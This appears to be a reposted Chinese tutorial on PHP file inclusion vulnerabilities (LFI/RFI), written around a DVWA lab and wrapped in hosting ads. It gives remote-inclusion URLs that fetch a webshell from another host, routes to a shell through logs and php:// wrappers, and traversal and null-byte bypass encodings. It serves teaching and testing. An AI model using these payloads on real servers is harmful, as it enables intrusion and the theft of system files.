本實驗是基于DVWA和sqli-labs的實驗環(huán)境

目前成都創(chuàng)新互聯(lián)公司已為成百上千家的企業(yè)提供了網(wǎng)站建設、域名、網(wǎng)頁空間、成都網(wǎng)站托管、企業(yè)網(wǎng)站設計、雙江網(wǎng)站維護等服務，公司將堅持客戶導向、應用為本的策略，正道將秉承"和諧、參與、激情"的文化，與客戶和合作伙伴齊心協(xié)力一起成長，共同發(fā)展。

實驗平臺搭建：下載Wamp集成環(huán)境，并下載DVWA和sqli-labs和壓縮包解壓至wamp\www的目錄下。安裝只要注意Wamp環(huán)境的數(shù)據(jù)庫名和密碼對應即可。

0x01：文件包含漏洞

服務器通過php的特性（函數(shù)）去包含任意文件時，由于要包含的這個文件來源過濾不嚴，從而可以去包含一個惡意文件，而我們可以構造這個惡意文件來達到邪惡的目的。

這也算官方的解釋吧，用個人的話說，通過瀏覽器、url地址或者是一個參數(shù)的變量的內(nèi)容，可以通過修改這些url或者參數(shù)變量的內(nèi)容，讀取到web根目錄以前其他文件，但是不同于目錄瀏覽，目錄瀏覽是可以通過瀏覽器直接顯示www目錄下每一個文件的名稱，把目錄列表給列出來。

 文件包含漏洞形成原因

 程序開發(fā)人員一般會把重復使用的函數(shù)寫到單個文件中，需要使用某個函數(shù)時直接調(diào)用此文件，而無需再次編寫，這中文件調(diào)用的過程一般被稱為文件包含。程序開發(fā)人員一般希望代碼更靈活，所以將被包含的文件設置為變量，用來進行動態(tài)調(diào)用，

但正是由于這種靈活性，從而導致客戶端可以調(diào)用一個惡意文件，造成文件包含漏洞。幾乎所有腳本語言都會提供文件包含的功能，但文件包含漏洞在PHP Web Application中居多,而在JSP、ASP、ASP.NET程序中卻非常少，甚至沒有，這是有些語言設計的弊端。在PHP中經(jīng)常出現(xiàn)包含漏洞，但這并不意味這其他語言不存在。

 常見文件包含函數(shù)

include()：執(zhí)行到include時才包含文件，找不到被包含文件時只會產(chǎn)生警告，腳本將繼續(xù)執(zhí)行

require()：只要程序一運行就包含文件，找不到被包含的文件時會產(chǎn)生致命錯誤，并停止腳本

include_once()和require_once()：這兩個函數(shù)和前兩個函數(shù)作用幾乎相同，區(qū)別在于若文件中代碼已被包含則不會再次包含

LFI（本地包含漏洞）目錄遍歷可以理解為本地包含漏洞，驗證以及利用方法都相同。

RFI（遠程包含漏洞）可以包含進其他主機的url地址，如自己開放一個www服務，然后在上面放一個***文件，如果是代碼會在這個機器上執(zhí)行的。拿到shell的權限要看運行www服務的帳號。

包含漏洞的特征：（這個可以說是文中的干貨了）

在某一個頁面中，一個變量的值等于一個頁面文件或者是一個固定的值，如

？page=a.asp

？home=b.html

？file=content

漏洞分類

本地文件包含：可以包含本地文件，在條件允許時甚至能執(zhí)行代碼

    上傳圖片馬，然后包含

    讀敏感文件，讀PHP文件

    包含日志文件GetShell

    包含/proc/self/envion文件GetShell

    包含data:或php://input等偽協(xié)議

    若有phpinfo則可以包含臨時文件

遠程文件包含：可以直接執(zhí)行任意代碼

要保證php.ini中allow_url_fopen和allow_url_include要為On

0x02、文件包含漏洞利用

1、包含讀出目標機上其它文件

如果對取得的參數(shù)page沒有過濾，于是我們可以任意指定目標主機上的其它敏感文件

在linux中，"."表示當前目錄，“..”表示上一層目錄，當../到根目錄下，再往上層父目錄仍舊是根目錄。

用常見的“../”包含出日志文件。

2、包含可運行的PHP***

在很多地方，我們都可以上傳圖片，如上傳頭像，圖片等，這這里先上傳圖片，圖片的內(nèi)容為一句話***

由于上傳的限制，一般只能上傳jpg，png的圖片格式，代碼無法執(zhí)行，我們用本地包含的方式將圖片包含進來，代碼就執(zhí)行了，代碼不需要后綴名是php、asp的格式，只要內(nèi)容是代碼即可執(zhí)行。

然后用中國菜刀連接（功夫再高，也怕菜刀?。?/p>

3.遠程包含url和php***

如果目標主機的"allow_url_fopen"是激活的（默認是激活的），我們就可以有更大的利用空間，我們可以指定其它URL上的一個包含PHP代碼的webshell來直接運行

不需要后綴名是php、asp的格式，只要內(nèi)容是代碼就可以。

出現(xiàn)概率少于本地包含，但更容易被利用

如在自己服務器上寫上一句話代碼，然后用遠程包含漏洞去包含這個鏈接，

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://192.168.0.117/a.php

然后同上，用菜刀連接，獲取webshell。

0x03、包含漏洞繞過技巧

在利用包含漏洞中，經(jīng)常遇到一個問題，在查看page=/etc/passwd的時候，出現(xiàn)報錯，找不到/etc/passwd.php文件，說明默認自動加上了后綴名.php，繞過的方式有一下幾種

1.編碼繞過字符過濾

（1）加“.”，當加點，會忽略點后面的內(nèi)容。

（2）“%00”，即null空字符（/etc/passwd%00）,在php語言格式里，當遇到%00的時候，后面不管有無其他東西，都不看了，只看%00前面的內(nèi)容

（3）“#”，繞過文件擴展名過濾

2、編碼

url編碼、雙層（多層）url編碼

%2e%2e%2f  解碼：../

%2e%2e%5c  解碼：..\

%25%2e%25%2e%255c 解碼：..\（可使用burp多層編碼和解碼）

uniclode/UTF-8編碼

..%c0%af  解碼：../

%c1%9c  解碼：..\

但編碼能否正確的起到效果，得看web server是否能對編碼后的做解析

3、其他系統(tǒng)可能是使用到的特殊字符

file.txt ...

file.txt

file .txt """"""""

file.txt <<>><

./././ file.txt

4、***向量字典

在kali中，也存在***向量字典路徑是“/usr/share/wfuzz/wordlist/vulns”

利用條件

程序用include()等文件包含函數(shù)通過動態(tài)變量的范式引入需要包含的文件

用戶能夠控制該動態(tài)變量

漏洞危害

這類漏洞看起來貌似并不嚴重，一旦被惡意利用則會帶來很大的危害。本地文件包含不僅能夠包含web文件目錄中的一些配置文件（比如Web應用、數(shù)據(jù)庫配置文件、config文件），還可以查看到一些Web動態(tài)頁面的源代碼，為***者進一步發(fā)掘web應用漏洞提供條件，甚至一旦與路徑遍歷漏洞相結合，還可能直接攫取目標系統(tǒng)的用戶名與密碼等文件。并且能執(zhí)行任意代碼，甚至控制服務器。

另外有需要云服務器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務器15元起步，三天無理由+7*72小時售后在線，公司持有idc許可證，提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應用場景需求。

當前標題：文件包含漏洞總結-創(chuàng)新互聯(lián)
轉載來于：http://weahome.cn/article/dddogh.html